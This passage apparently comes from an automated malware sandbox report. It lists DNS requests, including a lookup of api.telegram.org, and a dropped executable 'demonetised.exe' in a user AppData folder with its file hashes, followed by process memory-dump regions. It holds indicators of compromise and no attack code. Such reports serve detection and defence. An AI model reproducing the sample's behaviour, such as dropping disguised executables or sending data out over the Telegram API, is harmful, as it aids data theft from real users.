      1.112.21.104.in-addr.arpa

    • 8.8.8.8:53
      api.telegram.org
      dns
      svchost.exe
      62 B
      78 B
      1
      1

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      220.167.154.149.in-addr.arpa
      dns
      74 B
      167 B
      1
      1

      DNS Request

      220.167.154.149.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      217.135.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      217.135.221.88.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\inhumate\demonetised.exe

      Filesize

      634KB

      MD5

      80a64f0b8df55d637e135f0eb4fb6b70

      SHA1

      f491fc184d0f15d789e81577e47446478c10ed53

      SHA256

      3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8

      SHA512

      f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432

    • memory/1264-7-0x0000000000C00000-0x0000000001000000-memory.dmp

      Filesize

      4.0MB

    • memory/1264-0-0x0000000000640000-0x00000000007AF000-memory.dmp

      Filesize

      1.4MB

    • memory/1264-13-0x0000000000640000-0x00000000007AF000-memory.dmp

      Filesize

      1.4MB

    • memory/1500-27-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-35-0x00000000069F0000-0x0000000006BB2000-memory.dmp

      Filesize

      1.8MB

    • memory/1500-24-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-25-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-26-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-39-0x0000000006990000-0x000000000699A000-memory.dmp

      Filesize

      40KB

    • memory/1500-28-0x000000007459E000-0x000000007459F000-memory.dmp

      Filesize

      4KB

    • memory/1500-29-0x0000000005440000-0x0000000005490000-memory.dmp

      Filesize

      320KB

    • memory/1500-30-0x0000000005DB0000-0x0000000006354000-memory.dmp

      Filesize

      5.6MB

    • memory/1500-31-0x0000000005500000-0x000000000554E000-memory.dmp

      Filesize

      312KB

    • memory/1500-32-0x0000000005800000-0x000000000589C000-memory.dmp

      Filesize

      624KB

    • memory/1500-38-0x0000000006BC0000-0x0000000006C52000-memory.dmp

      Filesize

      584KB

    • memory/1500-34-0x0000000000400000-0x0000000000437000-memory.dmp

      Filesize

      220KB

    • memory/1500-37-0x000000007459E000-0x000000007459F000-memory.dmp

      Filesize

      4KB

    • memory/1500-36-0x0000000006890000-0x00000000068E0000-memory.dmp

      Filesize

      320KB

    • memory/3724-22-0x0000000001450000-0x0000000001850000-memory.dmp

      Filesize

      4.0MB

    • memory/3724-33-0x00000000004D0000-0x000000000063F000-memory.dmp

      Filesize

      1.4MB

    • memory/3724-14-0x00000000004D0000-0x000000000063F000-memory.dmp

      Filesize

      1.4MB
